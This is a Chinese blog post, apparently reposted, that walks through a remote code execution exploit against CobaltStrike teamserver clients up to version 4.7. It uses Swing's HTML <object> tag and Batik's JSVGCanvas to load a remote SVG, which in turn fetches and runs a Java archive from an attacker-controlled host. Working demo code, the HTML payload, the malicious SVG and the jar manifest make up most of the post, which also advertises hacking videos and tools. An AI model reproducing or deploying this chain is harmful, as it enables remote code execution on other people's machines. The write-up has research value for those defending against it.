扫码领资料

获网安教程

免费&进群

之前9月份的时候，忘记写了。现在重新写一份记录一下整个过程。利用过程的查找真的是废了眼睛

CobaltStrike官方发布的最新4.7.1版本的更新日志中介绍，<=4.7的teamserver版本存在XSS漏洞

一、swing漏洞

CobaltStrike 使用的组件为swing 那么首先了解一下他是怎么解析使用html

https://docs.oracle.com/javase/tutorial/uiswing/components/html.html

解析HTMl Demo

import javax.swing.\*;
import java.awt.\*;
public class demo {
    /\*\*{
     \* 创建并显示GUI。出于线程安全的考虑，
     \* 这个方法在事件调用线程中调用。
     \*/
    private static void createAndShowGUI() {
        // 确保一个漂亮的外观风格
        JFrame.setDefaultLookAndFeelDecorated(true);
        // 创建及设置窗口
        JFrame frame = new JFrame("HelloWorldSwing");
        frame.setDefaultCloseOperation(JFrame.EXIT\_ON\_CLOSE);
        frame.setPreferredSize(new Dimension(800, 600));
        // 添加 "Hello World" 标签
        JLabel label = new JLabel("<html><h1>66666</h1></html>");
        frame.getContentPane().add(label);
        // 显示窗口
        frame.pack();
        frame.setVisible(true);
    }
    public static void main(String\[\] args) {
        // 显示应用 GUI
        javax.swing.SwingUtilities.invokeLater(new Runnable() {
            public void run() {
                createAndShowGUI();
            }
        });
    }
}

追踪一下解析html 的过程 发现最终会调用到javax.swing.text.html.HTML.java

会循环调用 每个TAG 标签。 执行完之后会经过javax/swing/text/html/HTMLDocument.HTMLReader 进行一个初始化

每个标签都有一个初始化函数例如：

例如A标签

这里大概明白了 他的一个整体的逻辑了。就是每个TAG 都有一个或者公用的一个类。

然后进入到javax/swing/text/html/HTMLEditorKit.create 函数中

在HTMLEditorKit里的create方法可以看到不同的标签会对应到创建不同的view

那么顺序是Read –> create –>new xx 视图。例如H6标签。如下

其中发现一个有意思的标签javax/swing/text/html/ObjectView

例子如下：

    <object classid="javax.swing.JLabel">
    <param name="text" value="sample text">
    </object>

代码如下：

  /\*\*
     \* Create the component.  The classid is used
     \* as a specification of the classname, which
     \* we try to load.
     \*/
    protected Component createComponent() {
        AttributeSet attr = getElement().getAttributes();
        String classname = (String) attr.getAttribute(HTML.Attribute.CLASSID);
        try {
            ReflectUtil.checkPackageAccess(classname);
            Class c = Class.forName(classname, true,Thread.currentThread().
                                    getContextClassLoader());
            Object o = c.newInstance();
            if (o instanceof Component) {
                Component comp = (Component) o;
                setParameters(comp, attr);
                return comp;
            }
        } catch (Throwable e) {
            // couldn't create a component... fall through to the
            // couldn't load representation.
        }
        return getUnloadableRepresentation();
    }

首先获取了classid 字符串名称。然后直接获取了这个类的对象。然后进行实例化这个类。。但是这个有一个条件，就是为 Component 类或者是他的子类

那么看看。对应的key VALUE 的设置

那么总结一下这个object 的利用的条件

classid传入需要实例化的类，类必须继承与Component必须有无参构造方法，貌似是因为newinstant是调用的无参构造方法必须存在一个setXXX方法的XXX属性setXXX方法的传参数必须是接受一个string类型的参数

那么根据如上的要求。写了一个Demo

import java.awt.Dimension;
import javax.swing.\*;
public class demo {
    private static void createAndShowGUI() {
        // 确保一个漂亮的外观风格
        JFrame.setDefaultLookAndFeelDecorated(true);
        // 创建及设置窗口
        JFrame frame = new JFrame("HelloWorldSwing");
        frame.setDefaultCloseOperation(JFrame.EXIT\_ON\_CLOSE);
        frame.setPreferredSize(new Dimension(800, 600));
        // 添加 "Hello World" 标签
        String payload = "<html><object classid='javax.swing.JLabel'><param name='text' value='test'></object>";
        System.out.println(payload);
        JLabel label = new JLabel(payload);
        frame.getContentPane().add(label);
        // 显示窗口
        frame.pack();
        frame.setVisible(true);
    }
    public static void main(String\[\] args) {
        // 显示应用 GUI
        javax.swing.SwingUtilities.invokeLater(new Runnable() {
            public void run() {
                createAndShowGUI();
            }
        });
    }
}

JLabel 继承链—> JComponent —>Container —>Component

public class JLabel extends JComponent implements SwingConstants, Accessible

这里是引用了。javax.swing.JLabel.setText 函数

二、CobaltStrike 代码类的寻找

首先我们先导入任意一个版本的CS jar包到当前项目中

通过Navigate —–> Type Hierarchy 查询所有的子类

还可以使用codeql 进行查询

class SetMethod extends Method{
    SetMethod(){
        this.getDeclaringType().getASupertype\*().hasQualifiedName("java.awt", "Component") and
        this.getName().indexOf("set") = 0 and
        this.getName().length() > 3 and
        this.isPublic() and
        this.fromSource() and
        this.getNumberOfParameters() = 1
        and this.getAParamType().getName() = "String"
        and this.getTotalNumberOfLines() > 3
        and this.getDeclaringType().getAConstructor().isPublic()
        and this.getDeclaringType().getAConstructor().hasNoParameters()
    }
}
from SetMethod setMethod
select setMethod, setMethod.getDeclaringType().getPackage().getName()+"."+setMethod.getDeclaringType()

大概找了好几个小时之后。就发现了这个类比较符合条件的

org.apache.batik.swing.JSVGCanvas.setURI()

    public void setURI(String var1) {
        String var2 = this.uri;
        this.uri = var1;
        if (this.uri != null) {
            this.loadSVGDocument(this.uri);
        } else {
            this.setSVGDocument((SVGDocument)null);
        }
        this.pcs.firePropertyChange("URI", var2, this.uri);
    }

那么试试这个是否可以访问某个URl

import javax.swing.\*;
import java.awt.\*;
import javax.swing.JLabel;
public class demo {
    /\*\*{
     \* 创建并显示GUI。出于线程安全的考虑，
     \* 这个方法在事件调用线程中调用。
     \*/
    private static void createAndShowGUI() {
        // 确保一个漂亮的外观风格
        JFrame.setDefaultLookAndFeelDecorated(true);
        // 创建及设置窗口
        JFrame frame = new JFrame("HelloWorldSwing");
        frame.setDefaultCloseOperation(JFrame.EXIT\_ON\_CLOSE);
        frame.setPreferredSize(new Dimension(800, 600));
        // 添加 "Hello World" 标签
        JLabel label = new JLabel("<html><object classid='org.apache.batik.swing.JSVGCanvas'><param name='URI' value='http://192.168.1.72/1.txt'></object>\\n");
        frame.getContentPane().add(label);
        // 显示窗口
        frame.pack();
        frame.setVisible(true);
    }
    public static void main(String\[\] args) {
        // 显示应用 GUI
        javax.swing.SwingUtilities.invokeLater(new Runnable() {
            public void run() {
                createAndShowGUI();
            }
        });
    }
}

发现是可以访问到的。那么有一个url 访问能有啥用呢？

尝试翻翻官方文档

https://xmlgraphics.apache.org/batik/using/scripting/ecmascript.html

发现竟然可以调用import

尝试一下

<?xml version="1.0" standalone="no"?>
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
  <script>
    Runtime.getRuntime().exec('calc');
</script>
</svg>

发现并不可行。继续看看官方文档。

https://xmlgraphics.apache.org/batik/using/scripting/java.html

发现还可以 application/java-archive 这种类型的加载

查找了一下Demo

https://www.agarri.fr/blog/archives/2012/05/11/svg\_files\_and\_java\_code\_execution/index.html

远程svg 文件

<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100" xmlns:xlink="http://www.w3.org/1999/xlink">
        <script type="application/java-archive" xlink:href="http://127.0.0.1/6445.jar"> 
</script>  
</svg>

制作一个利用的jar包

MANIFEST.MF 制定好你写的类

Manifest-Version: 1.0
Main-Class: mains
SVG-Handler-Class: export.Demo

然后使用IDEA 的打包成jar 即可

然后执行一下 成功完成RCE

参考：

https://mp.weixin.qq.com/s/l5e2p_WtYSCYYhYE0lzRdQ

https://mp.weixin.qq.com/s/fZtDvpyAo-UZRE9MhfB0VQ

来源:https://www.o2oxy.cn/4157.html

声明：⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤，任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的，否则后果⾃⾏承担。所有渗透都需获取授权！

（hack视频资料及工具）

（部分展示）